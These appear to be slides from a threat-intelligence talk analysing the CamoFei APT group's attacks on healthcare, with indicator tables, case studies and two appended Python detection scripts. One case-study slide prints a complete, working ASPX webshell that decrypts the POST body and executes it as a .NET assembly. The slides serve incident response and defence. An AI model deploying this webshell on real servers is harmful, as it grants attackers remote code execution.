# Unmasking CamoFei

###### An In-depth Analysis of an Emerging APT Group Focused on Healthcare Sectors in East Asia

Still Hsu, DuckLL

-----

### About us

###### Still Hsu (Azaka)

• Threat Intelligence Researcher @ TeamT5
• Non-binary (they/them)
• Part-time streamer

###### Zih-Cing Liao (aka DuckLL)

• Sr. Threat Intelligence Researcher @ TeamT5
• Speaker of Conferences: Black Hat Asia, HITB, HITCON, CODE BLUE
• UCCU Hacker Core Member

-----

### AGENDA

01 Introduction
02 TTPs
03 Case Study
04 Conclusion

-----

## Introduction

-----

### CamoFei

- China-nexus APT threat group
- First seen: End of 2019
- Footprint Concealing
- Malware:
  - Cobalt Strike
  - DoorMe
  - IISBeacon
  - Timinp
  - MGDrive
  - AukDoor
  - CatB Ransomware

-----

### Related Work

◆ Positive Technologies in 2021
◆ ChamelGang
◆ ProxyShell Exploit
◆ Malware
  - BeaconLoader & Cobalt Strike
  - ProxyT
  - DoorMe

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/

-----

### Target Country

- Taiwan, Vietnam, Philippines, Thailand, India, Turkey, Brazil, Hong Kong
- Russia, US, Japan, Afghanistan, Lithuania, Nepal

-----

### Target Industry

-----

### Critical Infrastructure

- Energy
- Water
- Communication
- Transportation
- Finance
- Healthcare
- Government
- High-Tech

-----

### Covid-19

https://ourworldindata.org/explorers/coronavirus-data-explorer

-----

### Motivation

- Money
- PII
- DoS
- Knowledge
- Information Operation

-----

### Common Issues

- OT Security
- Lack of Security Staff
- Complex System and Network
- Outdated Hardware and Software

-----

### News

https://edition.cnn.com/2023/06/12/politics/cyberattack-hospital-closure/index.html
https://www.cnbc.com/2023/07/10/hca-healthcare-patient-data-stolen-and-for-sale-by-hackers.html
https://www.bleepingcomputer.com/news/security/north-korean-ransomware-attacks-on-healthcare-fund-govt-operations/

-----

### HITCON Zero-day

-----

## TTPs: Initial Access

-----

### Spear phishing

-----

### Exploitation

###### https://proxylogon.com/

-----

## TTPs: Malware

-----

### Primary Arsenal

- Cobalt Strike: special loader
- MGDrive: Google Drive tool
- AukDoor: Linux backdoor
- DoorMe: IIS-based backdoor
- Timinp
- CatB Ransomware

-----

#### Cobalt Strike (Custom Loaders)

-----

### Cobalt Strike (Watermark)

| Date | MD5 | Watermark |
|------|-----|-----------|
| 2020-05-20 | 9a221336204d671fafd830c84d9bdc26 | 985457035 |
| 2021-02-26 | 897bfb316d2e8ff72031a3332842be0f | 1421888813 |
| 2021-09-17 | 90cc1835823d5f86cd1947b03e6111a9 | 1028153346 |
| 2021-09-18 | 6a3c69384237078b6ab03ab7c38970ca | 1028153346 |
| 2021-10-26 | 76449d55107fcc7cd666514892879aae | 1570652404 |
| 2022-03-24 | 426ee09eaa0d8940ac5f730d1c48be7c | 164069343 |
| 2022-04-21 | 634c08a0dac337f3c2cde4dfdd03ca5f | 1028153346 |
| 2022-04-21 | 9755ee49da758de56286ee9fc512ed5d | 363348564 |
| 2023-02-08 | 9c5658ba8a8ab9e92c96f13247d3b17e | 373441684 |
| 2023-02-15 | 6171eaf5a3ac9500c8043d2fecc589cd | 1444764933 |
| 2023-03-10 | 0d76b20ab79afaf650aa12ea7e448d2f | 1578452238 |
| 2023-04-21 | 900ead32a061c7047a4e438589102d25 | 0 |
| 2023-06-28 | f8c137c83b6dfdeb9f0403ea7e2c51c7 | 1299761752 |

-----

### MGDrive

• Government agency
• MGD.dll

-----

### DoorMe

###### Compiler-level obfuscation

-----

### Timinp

-----

### CatB Ransomware

- Discovered in a TW telecommunication agency
- Uses the same MSDTC chain they have been using for 3+ years
- Uses a similar decoding mechanism
- Signed with a valid certificate from "coolschool"

-----

### CatB Ransomware

- Signed with a valid certificate from "coolschool"
- Several samples linked to the certificate contain an icon hash linked to Case Study #1

-----

### CatB Ransomware

- Matches the pattern used by the same actor discovered in other cases
- `[A-Z][\d]{3,4}@protonmail.com`
- BTC wallet only had a tiny bit of traffic on April 29, 2023

-----

### CatB Ransomware

- Similar samples use identical email pattern & provider
- Uses .bak9 extension
- Matches another ransomware incident against an Indian medical university
- Also linked to a Chinese-nexus group based on INCERT investigation

https://indianexpress.com/article/cities/delhi/aiims-cyber-attack-at-least-five-servers-infected-have-data-of-3-4-crore-patients-8297028/

-----

### Use of Various Hacktools

-----

## TTPs: Infrastructures

-----

### Use of Cloud Services

- GitHub (C2 download)
- Google Drive (MGDrive, Timinp)

-----

### C2 Stations

(chart: number of C2 stations by hosting country; Romania and the USA are labelled)

-----

## Case Study #1: Spear phishing -> Healthcare

-----

### Spear phishing #1

- Email was sent via a legitimate email server from a tertiary school
  - Compromised and abused
- Fake resume as lure
- Self-extracting RAR
  - Contains a resume, encoded Cobalt Strike Beacon and its loader

-----

### Spear phishing #2

- Fake resume for volunteering at a certain healthcare organization as lure
- Self-extracting RAR
  - Contains a resume, encoded Cobalt Strike Beacon and its loader

-----

### Spear phishing #3

- Generic dental advice as lure
- Self-extracting RAR
  - Contains a document, custom loader, and encoded Cobalt Strike beacon inside an encrypted ZIP file
- Encrypted ZIP embedded
  - Contains "CFG1D19"
- Decimal-encoded payload
  - Still used by the same group to this day

-----

### Summary

- All the spear phishing files were prepped almost simultaneously with the launch of the attack
  - May 2020
- Heavily abused Cobalt Strike
- Uses decimal-encoded payload
  - Still part of their arsenal at present

-----

## Case Study #2: ProxyLogon Post-exp

-----

### Attack Flow

-----

### Attack Flow

```
<%@Page Language="C#"%>
<%
HttpContext h = HttpContext.Current;
string s = "c01bc5249636a40d";   // hard-coded 16-byte AES key, also used as the IV
h.Application.Set("k", s);
try {
    // read the raw POST body and AES-decrypt it with key == IV
    byte[] k = Encoding.Default.GetBytes(s), c = h.Request.BinaryRead(h.Request.ContentLength);
    // load the decrypted bytes as a .NET assembly and instantiate its type "U"
    System.Reflection.Assembly.Load(
        new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)
    ).CreateInstance("U");
} catch (Exception e) { }
%>
```

-----

### Attack Flow

-----

### Attack Flow

```
System.Data.DataSet ds = new System.Data.DataSet();
System.Data.SqlClient.SqlCommand cmd = new System.Data.SqlClient.SqlCommand(sqlStr, connection);
System.Data.SqlClient.SqlDataAdapter da = new System.Data.SqlClient.SqlDataAdapter(cmd);
da.Fill(ds);
System.Data.DataTable dataTable = ds.Tables[0];
if (dataTable.Rows.Count == 0) {
    lblInfo.Text = "没有需要导出的数据!";
    lblInfo.ForeColor = System.Drawing.Color.Blue;
    return;
}
```

-----

### Attack Flow

-----

### Summary

- Attack occurred around mid-September 2021
- Leverages unpatched exploits and numerous open-source projects as part of the post-exploitation actions
- Deploys various webshells and .NET backdoors
- Relies heavily upon the MSDTC DLL hijacking technique

-----

## Conclusion

-----

### Key Takeaways

◆ CamoFei has launched massive attacks all over the world
◆ APT attacks targeting healthcare are increasing and expanding
◆ CamoFei TTP
  - Abuse legitimate Windows service as a launcher
  - Abuse cloud service for anti-tracking
  - Use ransomware to erase the traces

-----

### Mitigation

◆ Healthcare should strengthen its security capabilities
◆ Double-check emails
◆ Update and patch software vulnerabilities
◆ Limit the usage of cloud services

-----

## THANK YOU!

###### Zih-Cing Liao duckll@teamt5.org
###### links.azaka.fun still@teamt5.org

-----
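The decimal-encoded payload from Spear phishing #3 (Case Study #1) is the kind of artifact a responder has to carve out of a dropped file. The following Python triage helper is an added example, not code from the talk or from TeamT5; it assumes the bytes are written as comma-, semicolon- or whitespace-separated decimal values (the talk does not state the separator) and the sample input is constructed.

```python
import re

# Constructed sample: the first bytes of a PE header written out as decimal
# values, the way a decimal-encoded Cobalt Strike beacon might be stored.
# The comma separator is an assumption; the talk only says "decimal-encoded".
SAMPLE_ENCODED = "77,90,144,0,3,0,0,0,4,0,0,0,255,255,0,0,184,0,0,0,0,0,0,0,64"

# A run of at least nine 1..3-digit integers separated by commas, semicolons
# or whitespace. Four-digit tokens (e.g. years) break a run, so ordinary text
# with numbers in it rarely qualifies.
DECIMAL_RUN = re.compile(r"(?:\d{1,3}[\s,;]+){8,}\d{1,3}")


def decode_decimal_run(text):
    """Return the bytes for the longest run whose values all fit in 0..255."""
    best = b""
    for m in DECIMAL_RUN.finditer(text):
        vals = [int(t) for t in re.findall(r"\d{1,3}", m.group(0))]
        if all(v <= 255 for v in vals) and len(vals) > len(best):
            best = bytes(vals)
    return best


def triage(text):
    """Decode the candidate blob and report what a responder wants to know."""
    decoded = decode_decimal_run(text)
    findings = []
    if decoded:
        findings.append("decimal-encoded blob (%d bytes)" % len(decoded))
    if decoded.startswith(b"MZ"):
        findings.append("decoded blob starts with MZ (PE image)")
    return decoded, findings


if __name__ == "__main__":
    blob, notes = triage(SAMPLE_ENCODED)
    for note in notes:
        print(note)
```

Run it over the extracted contents of a suspicious self-extracting archive; a decoded blob starting with `MZ` is the cue to hand the bytes to a sandbox or a Beacon config parser.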
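To hunt for the Case Study #2 webshell pattern across an Exchange web root, this added Python scanner (not from the talk or from TeamT5) looks for the combination the slide shows: a raw request-body read, Rijndael decryption with a hard-coded key reused as the IV, and `Assembly.Load` of the result. The indicator names, the 16-byte key regex, the minimum-hit threshold and the benign control sample are my assumptions; the two inputs are constructed from the code on the slides.

```python
import os
import re

# Constructed test input: the webshell from the Attack Flow slide, single-spaced.
SAMPLE_ASPX = '''<%@Page Language="C#"%>
<% HttpContext h=HttpContext.Current; string s="c01bc5249636a40d"; h.Application.Set("k",s);
try { byte[] k=Encoding.Default.GetBytes(s),c=h.Request.BinaryRead(h.Request.ContentLength);
System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k,k).TransformFinalBlock(c,0,c.Length)).CreateInstance("U"); }catch(Exception e) { } %>'''

# Constructed control input: the ordinary data-export code from the same slides.
BENIGN_ASPX = '''System.Data.SqlClient.SqlCommand cmd = new System.Data.SqlClient.SqlCommand(sqlStr, connection);
da.Fill(ds); if (dataTable.Rows.Count==0) { lblInfo.Text = "no data"; return; }'''

# Each indicator alone is legitimate; together they describe "decrypt the POST body and run it".
INDICATORS = {
    "reads raw request body": re.compile(r"Request\.BinaryRead\s*\("),
    "Rijndael/AES decryption": re.compile(r"RijndaelManaged|AesManaged|AesCryptoServiceProvider|Aes\.Create"),
    "key reused as IV": re.compile(r"CreateDecryptor\s*\(\s*(\w+)\s*,\s*\1\s*\)"),
    "loads decrypted assembly": re.compile(r"Assembly\.Load\s*\("),
    "instantiates loaded type": re.compile(r"CreateInstance\s*\("),
}
# A 16-character string literal assigned to a local: a hard-coded AES-128 key (assumption).
KEY_RE = re.compile(r'string\s+\w+\s*=\s*"([^"\s]{16})"')


def scan_aspx(src):
    """Return matched indicators, any hard-coded 16-byte key, and a verdict."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(src)]
    keys = KEY_RE.findall(src)
    verdict = "webshell-like" if len(hits) >= 3 else "no match"
    return {"hits": hits, "keys": keys, "verdict": verdict}


def scan_tree(root, exts=(".aspx", ".ashx", ".asmx")):
    """Walk a web root and collect files whose source matches the pattern."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    result = scan_aspx(fh.read())
                if result["verdict"] == "webshell-like":
                    findings[path] = result
    return findings
```

A recovered key lets the IR team decrypt captured POST bodies to the shell and see which assemblies were loaded, which is where the .NET backdoors from this case would turn up.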